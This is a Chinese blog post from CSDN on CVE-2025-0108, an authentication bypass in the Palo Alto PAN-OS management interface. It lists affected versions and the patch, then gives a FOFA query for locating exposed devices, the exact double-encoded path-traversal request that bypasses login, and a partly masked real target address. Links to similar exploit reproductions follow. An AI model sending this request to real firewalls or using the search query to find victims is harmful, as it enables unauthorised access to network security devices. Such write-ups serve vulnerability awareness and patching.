漏洞预警:Palo Alto Networks PAN-OS 身份验证绕过漏洞复现(CVE-2025-0108)

已于 2025-02-19 13:23:45 修改
阅读量971 收藏 6
点赞数 4
分类专栏: 漏洞利用 文章标签: 安全 web安全
于 2025-02-19 13:22:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yuanlirong22/article/details/145726928
版权

一、简介
1、产品描述:Palo Alto Networks PAN-OS GlobalProtect 是Palo Alto Networks 的一款防火墙产品。2025年2日,互联网上披露 CVE-2025-0108 Palo Alto Networks PAN-OS Management 管理端权限绕过漏洞。攻击者可构造恶意请求绕过身份认证进入后台,执行恶意操作。
2、影响产品或组件及版本:该漏洞已在 PAN-OS 的 10.1.14-h9、10.2.13-h3、11.1.6-h1 和 11.2.4-h4 版本中修复,并影响这些固定版本之前的所有 PAN-OS 10.1、10.2、11.1 和 11.2 版本。
3、修补措施:官方修补措施:升级至最新版本;修补建议:PAN-OS 管理接口的访问限制为仅白名单 IP 地址,降低漏洞风险。
4、漏洞来源:https://security.paloaltonetworks.com/CVE-2025-0108

二、漏洞复现
1、使用的fofa搜索语法
icon_hash="873381299"

2、复现原理

GET请求访问目标系统的/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css

GET /unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css HTTP/1.1

Content-Type: application/json

Host: your-ip or your-url

3、复现案例

https://52.xx.xx.67/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css

Palo Alto Networks PAN-OS 身份验证绕过漏洞复现(附脚本)(CVE-2025-0108)
iSee857的博客
02-13 3476
漏洞是由于PAN-OS中Nginx/Apache对路径的处理不同导致的。未经授权的攻击者可以利用这一漏洞绕过系统身份验证直接访问Web界面从而造成敏感数据泄露或系统被接管等更大的危害。
Palo Alto Networks Expedition 远程命令执行漏洞复现(CVE-2024-9463)
iSee857的博客
10-18 830
攻击者可通过简单的漏洞利用读取数据库内容和任意文件,甚至执行系统命令。该漏洞允许未经身份验证的攻击者以root身份执行命令,暴露PAN-OS防火墙的用户名、密码等敏感信息。Palo Alto Networks Expedition 是一款强大的工具,帮助用户有效地迁移和优化。策略,提升安全管理的效率和效果。它的自动化功能、策略分析和可视化报告使其在网络安全领域中成为一个重要的解决方案。厂商已发布补丁 请即时升级。
CVE-2025-24859漏洞复现
最新发布
qq_60136356的博客
04-22 429
Apache Roller是美国阿帕奇(Apache)基金会的一款基于Java的多用户开源博客系统,最初由Dave Johnson在2002年编写,之后在FreeRoller.net(现在的JRoller.com)上流行起来,后来被用于驱动Sun Microsystems公司的员工博客以及IBM DeveloperWorks博客。美国时间2025年4月14日,Apache软件基金会发布公告,在低于6.1.5版本的Apache Roller中存在会话管理漏洞漏洞评分为10分,危害极其严重。
Palo Alto Networks Expedition 未授权SQL注入漏洞复现(CVE-2024-9465)
iSee857的博客
10-15 1176
Palo Alto Networks Expedition 是一款强大的工具,帮助用户有效地迁移和优化网络安全策略,提升安全管理的效率和效果。它的自动化功能、策略分析和可视化报告使其在网络安全领域中成为一个重要的解决方案。该漏洞由于CHECKPOINT.php文件存在未授权访问。在sql校验逻辑中存在action=import当解析控制参数时会创建变量routename和id并且以字符串格式构造查询。厂商已发布补丁 请即时升级。
Palo Alto防火墙远程代码执行漏洞复现
Just Do It
12-26 4082
最近,花了点时间复现了一下这个漏洞,踩过一些坑,在这里记录一下。关于这个漏洞的情况,可以看这里。       文章介绍说,三个漏洞组合完成代码执行的过程。作者其实写的蛮清楚的,但是在第三步是有一些坑要踩的。       首先,来复现部分权限绕过,先访问/php/utils/debug.php。会直接跳转到登录页面,如下图所示:       接着按照作者指导的方式,访问/esp/cms_c
漏洞复现Palo Alto PAN-OS身份认证绕过CVE-2024-0012及命令执行漏洞CVE-2024-9474
m0_46381222的博客
12-09 1756
漏洞复现Palo Alto PAN-OS身份认证绕过CVE-2024-0012及命令执行漏洞CVE-2024-9474
Palo Alto 再次修复一个严重的 PAN-OS 漏洞
smellycat000的专栏
07-09 1428
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队今日,Palo Alto Networks (PAN)公司修复了PAN-OS GlobalProtect门户网站中的又...
Palo Alto Networks PAN-OS身份认证绕过漏洞复现(CVE-2024-0012)
iSee857的博客
11-20 1306
PAN-OS 设备管理 Web 界面中存在身份认证绕过漏洞,未经身份验证的远程攻击者可以通过网络访问管理 Web 界面,从而进行后续活动,包括修改设备配置、访问其他管理功能以及利用 Palo Alto Networks PAN-OS 权限提升漏洞(CVE-2024-9474)获取root访问权限。
Palo Alto Networks PAN-OS身份认证绕过导致RCE漏洞复现(CVE-2024-0012)
0xSec
11-20 1557
PAN-OS 设备管理 Web 界面中存在身份认证绕过漏洞,未经身份验证的远程攻击者可以通过网络访问管理 Web 界面,从而进行后续活动,包括修改设备配置、访问其他管理功能以及利用 Palo Alto Networks PAN-OS 权限提升漏洞(CVE-2024-9474)获取root访问权限,执行任意命令,目前该漏洞技术细节与PoC已在互联网上公开,鉴于此漏洞已发现在野利用,建议用户尽快做好自查及防护。
Palo Alto Networks PAN-OS存在身份认证绕过漏洞(CVE-2024-0012)+Palo Alto Networks PAN-OS权限提升漏洞(CVE-2024-9474)
缘梦未来的博客
11-20 516
Palo Alto Networks是全球知名的网络安全厂商,PAN-OSPalo Alto Networks为其防火墙设备开发的操作系统。
漏洞复现Palo Alto Networks PAN-OS GlobalProtect 命令注入漏洞 CVE-2024-3400
失心少年
04-25 762
在特定PAN-OS版本和不同功能配置下,未经身份验证的攻击者可能利用此漏洞在防火墙上以root权限执行任意代码。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!poc如下,注入点在Cookie中,将其中的DNSlog地址替换为你的dnslog地址,借助DNSLOG来复现,可以使用http://dnslog.pw/
PAN-OS 入门指南.pdf
06-19
PA入门指南,包括防火墙配置,创建安全边界,配置用户标识,设置高可用性等等。 如果需要可以关注我。我将继续上传相关操作管理指南。
PAN-OS-7.0-配置管理指导-简体中文.pdf
06-13
Paloalto 220防火墙中文配置管理指导,管理员指南7.0。主要描述防火墙的管理配置,有助于理解防火墙的配置要点等信息
PAN-OS 管理员指南》- V9.0-中文版
02-18
适用于PAN-OS管理员配置指南-官方手册
PAN-OS 8.1 管理员指南.pdf
06-30
目前较新的Palo Alto防火墙中文操作手册,带你走进安全世界的大门,详细的内容,简洁的排版,所有内容在目录上一目了然。
Tomcat RCE(CVE-2025-24813)复现
Neolock的博客
03-21 2626
它由 Apache 软件基金会下的 Jakarta 项目开发,是目前最流行的 Java Web 服务器之一。这里需要注意Content-Range的分块值需要与Content-Length保持一致,且大于当前文件的长度。我们都知道tomcat是Java语言开发的,所以需要JAVA环境,我这里的Java环境是1.8.0_441。当文件被上传成功后,大概30s之内payload会被自动触发,随之文件会被清除。
PaloAlto DNS代理漏洞CVE-2017-8390)分析
ask every day
04-29 1215
1漏洞定位1.1漏洞基本情况该漏洞为公开漏洞,其CVE编号为:CVE-2017-8390,属于RCE漏洞,尚无POC公开,对应的服务为DNS代理服务,对应模块为dnsproxyd,以root权限运行。适用范围:PAN-OS before 6.1.18PAN-OS 7.x before 7.0.16PAN-OS 7.1.x before 7.1.11PAN-OS 8.x before 8.0.31....
Palo Alto PAN-OS 11.0
qq_33032009的博客
09-09 675
借助零延迟签名,网络中每个连接到 Internet 的 NGFW 都会在分析的个位数秒内更新 (sysin),确保第一个看到威胁的用户是唯一看到该威胁的用户。通过提供全面的产品组合,为不断发展中的合作伙伴生态系统赋能,在保护数以万计的企业云、网络和移动设备安全方面,我们始终站在最前沿。借助第一款引入内联深度学习(传统机器学习的子集)的新一代防火墙,您可以超越机器学习的结构化数据分析,并以人类的方式分析数据。​ 探索我们的产品系列,了解哪些解决方案最适合协同工作,为您的企业提供应有的全面保护。
Palo Alto:注意!PAN-OS 防火墙 0day 漏洞已遭利用
smellycat000的专栏
04-15 547
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Palo Alto Networks 公司提醒称,PAN-OS 防火墙中存在一个严重的命令注入0day漏洞,且该漏洞已遭在野利用。Palo Alto Networks 公司发布安全公告称,“Palo Alto Networks 注意到数量有限的攻击正在利用该漏洞。”该漏洞由 Volexity 公司发现,编号为CVE-2024-3400,是一个命令...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值